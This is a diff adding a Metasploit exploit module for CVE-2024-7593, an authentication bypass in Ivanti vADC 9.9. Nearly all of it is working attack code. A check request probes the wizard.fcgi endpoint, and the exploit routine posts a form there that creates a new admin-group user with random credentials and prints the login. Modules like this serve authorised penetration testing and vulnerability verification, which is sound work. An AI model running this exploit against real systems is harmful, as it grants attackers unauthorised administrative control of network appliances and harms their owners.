Ivanti vADC 9.9 Authentication Bypass

modules/exploits/linux/http/ivanti_vadc_auth_bypass.rb

@@ -0,0 +1,93 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'net/http'
+require 'uri'
+require 'securerandom'
+
+class MetasploitModule < Msf::Exploit::Remote
+  include Msf::Exploit::Remote::HttpClient
+
+  # Define default lengths for username and password
+  USERNAME_LENGTH = 8
+  PASSWORD_LENGTH = 18
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name' => 'Ivanti vADC 9.9 Authentication Bypass (CVE-2024-7593)',
+                      'Description' => '
+        This module exploits CVE-2024-7593, an authentication bypass vulnerability in Ivanti vADC 9.9.
+        The vulnerability allows an attacker to create new admin users without proper authentication.
+      ',
+                      'Author' => ['Berk Dusunur'],
+                      'License' => MSF_LICENSE,
+                      'References' => [
+                        ['CVE 2024-7593'],
+                        ['URL', 'https://www.ivanti.com/en-gb/products/virtual-application-delivery-controller']
+                      ],
+                      'Platform' => ['linux'],
+                      'Targets' => [['Ivanti vADC 9.9', {}]],
+                      'DisclosureDate' => '2024-08-03',
+                      'DefaultTarget' => 0))
+
+    register_options([
+                       Opt::RPORT(9090),
+                       OptString.new('TARGETURI', [true, 'The base path of the admin portal', '/'])
+                     ])
+  end
+
+  def generate_random_string(length)
+    SecureRandom.alphanumeric(length)
+  end
+
+  def check
+    uri = normalize_uri(datastore['TARGETURI'], 'apps/zxtm/wizard.fcgi')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => uri,
+      'vars_get' => { 'error' => '1', 'section' => 'Access Management:LocalUsers' }
+    )
+
+    return Exploit::CheckCode::Vulnerable if res && res.code.to_i == 200 && res.body.include?('<title>2<')
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    uri = normalize_uri(datastore['TARGETURI'], 'apps/zxtm/wizard.fcgi')
+    params = { 'error' => '1', 'section' => 'Access Management:LocalUsers' }
+
+    # Generate random credentials
+    username = generate_random_string(USERNAME_LENGTH)
+    password = generate_random_string(PASSWORD_LENGTH)
+
+    data = {
+      '_form_submitted' => 'form',
+      'create_user' => 'Create',
+      'group' => 'admin',
+      'newusername' => username,
+      'password1' => password,
+      'password2' => password
+    }
+
+    res = send_request_cgi({
+                             'method' => 'POST',
+                             'uri' => uri,
+                             'vars_get' => params,
+                             'data' => data,
+                             'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' }
+                           })
+
+    if res && res.code.to_i == 200 && res.body.include?('<title>2<')
+      print_good('New user created successfully.')
+      print_good("Login with username '#{username}' and password '#{password}'")
+    else
+      print_error('Failed to create new user.')
+    end
+  end
+end